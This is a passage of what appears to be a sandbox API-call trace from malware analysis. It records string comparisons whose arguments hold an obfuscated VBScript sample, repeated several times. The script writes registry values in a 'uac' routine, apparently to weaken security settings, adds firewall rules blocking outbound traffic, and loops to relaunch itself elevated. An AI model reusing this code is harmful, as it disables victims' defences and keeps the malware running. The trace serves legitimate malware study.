bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.381] wcsncmp (_String1="Rule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.381] wcsncmp (_String1="ule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.381] wcsncmp (_String1="le.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.382] wcsncmp (_String1="e.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.382] wcsncmp (_String1=".LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 